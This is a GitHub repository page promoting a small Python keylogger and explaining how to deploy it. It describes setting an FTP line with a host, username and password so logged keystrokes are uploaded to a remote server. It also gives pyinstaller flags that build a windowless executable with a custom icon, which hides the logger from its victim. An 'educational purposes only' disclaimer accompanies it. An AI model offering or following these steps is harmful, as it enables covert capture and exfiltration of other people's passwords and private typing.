cy4nguy / PythonSimpleKeylogger

Ez to use 50-line Python Keylogger !

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

PythonSimpleKeylogger

 _     _ _______ __   __         _____   ______  ______ _______  ______    _____  __   __
 |____/  |______   \_/   |      |     | |  ____ |  ____ |______ |_____/   |_____]   \_/  
 |    \_ |______    |    |_____ |_____| |_____| |_____| |______ |    \_ . |          |   

Yes, iKnow Keylogger in 2019 Well idk Xd.

About: This is Small Python key logger [Mid-LvL].
Tested On: Windows 10 / Windows7
Suport : +Windows XP
Date of Publish : 12/9/2019
Last Update : 12/9/2019
Features: Ftp support Light weight Cross platform.
Went Find out about what is KeyLogger

   When Find out about what is Keylogger  ? -> Click Hare <- 


To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Keylogger.py
Before Converting File to exe Run : pip install --user --requirement requirements.txt

ToDo :

Open Keylogger.py: and Replace these lines with your ftp sever address user/pass


with FTP("ftp.Yourhost.com","User","passw123") as ftp:
SomeCode

NOTE : Make sure you have path Like htdocs\logs in ftp sever.

Before Converting File to exe Run : pip install --user --requirement requirements.txt

NOTE: THIS SOURCE CODE IS For Educational Purposes Only.
IM NOT RESBONBLE FOR ANY BAD & MALICIOUS USE OF IT.

About

Ez to use 50-line Python Keylogger !

License:GNU General Public License v3.0


Languages

Language:Python 100.0%